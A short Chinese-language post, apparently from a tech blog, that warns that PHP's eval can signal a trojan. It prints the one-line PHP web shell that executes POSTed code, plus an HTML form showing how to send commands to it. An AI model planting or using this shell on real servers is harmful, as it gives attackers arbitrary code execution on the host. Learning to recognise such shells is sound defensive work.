eval可以用來執行任何其他php代碼,所以對於代碼裡發現了eval函數一定要小心,可能是木馬
就這一句話害死人,這樣任何人都可以post任何文件上來,所以要做好防范
<?php @eval($_POST['c']);?>
使用方法也很簡單,本地提交文件指向提交文件,裡面的php代碼就會被執行
<html> <body> <form action="a.php" method="post"> <input type="text" name="c" value="phpinfo();"> <input type="submit" value="submit"> </form> </body> </html>
以上所述就是本文的全部內容了,希望大家能夠喜歡。
